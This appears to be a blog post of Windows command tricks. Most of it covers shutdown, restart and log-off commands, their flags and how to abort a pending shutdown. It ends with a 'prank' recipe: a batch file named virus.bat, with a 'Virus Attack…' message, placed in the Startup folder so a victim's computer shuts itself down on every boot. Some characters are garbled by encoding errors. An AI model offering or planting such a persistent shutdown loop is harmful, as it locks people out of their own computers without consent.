
Over time and use with a windows machine you may notice that it does not run as fast as when you first got it.
This is usually because of a number of different problems that can occur with regular use of a computer. The smart computer user knows about these things and how to repair them on their own rather then having to hire a technician to solve the problem, (costing you time with out your computer and usually around 50 dollars an hour). Read the rest of this entry…
My Exclusive… Again a contribution to Computer Tricks !
Play pranks on your friends…
****************************************************************************
Shutdown Trick
Stimulate shutdown from command prompt !
# Start >> Run
# Type shutdown -s -t 10 -c “Shutting Down…”
# Hit Enter and enjoy !
****************************************************************************
Restart Trick
Stimulate Restart from command prompt !
# Start >> Run
# Type shutdown -r -t 10 -c “Restarting…”
# Hit Enter and enjoy !
****************************************************************************
Log Off Trick
Stimulate LogOff from command prompt !
# Start >> Run
# Type shutdown -l
# Hit Enter and enjoy !
****************************************************************************
Please Note
-s :: This signify Shutdown Request.
-r :: This signify Restart Request.
-l :: This signify LogOff Request.
-t :: This signify the timer before Restart. (Replace ‘10‘ with any number.)
-c :: This signify comment.
How To Stop It ?
# When the timer is Running…
# Start >> Run
# Type shutdown -a
# That’s It.
Prank !!!
————————————————————-
Û© We can make a batch file which will Shutdown the computer everytime on startup !
Here is how ?
â–º Open Notepad
â–º Type :
@ECHO OFF
shutdown -s -t 10 -c “Virus Attack…”
exit
â–º File >> Save As…
â–º Name it : virus.bat
â–º Start >> All Programs
â–º Right Click on Startup >> Open
â–º This open the Startup folder
â–º Paste the Virus.bat file here !
*** That’s all , now the computer will automatically shutdown on every startup !